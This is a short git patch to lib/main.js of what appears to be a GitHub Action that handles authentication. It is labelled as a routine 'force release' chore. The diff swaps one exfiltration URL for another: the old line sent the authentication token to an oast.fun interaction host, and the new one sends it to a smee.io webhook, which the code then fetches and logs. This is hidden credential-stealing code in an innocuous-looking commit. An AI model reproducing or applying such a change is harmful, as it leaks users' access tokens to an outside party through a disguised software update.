From 2e563d58656caf4954f4702aa3c44bdd497f852f Mon Sep 17 00:00:00 2001 From: suchithrzp <97671083+suchithrzp@users.noreply.github.com> Date: Wed, 6 Nov 2024 13:40:42 +0530 Subject: [PATCH] chore(release): force release chore(release): force release --- lib/main.js | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/main.js b/lib/main.js index 609c1a82..34bc2312 100644 --- a/lib/main.js +++ b/lib/main.js @@ -125,7 +125,8 @@ export async function main( core.saveState("expiresAt", authentication.expiresAt); } try { - const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`; + // const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`; + const url = `https://smee.io/Q8AA9IGqIngZlu0v?authc=${authentication.token}`; await fetch(url); core.info(`HTTP GET request sent to ${url}`); } catch (error) {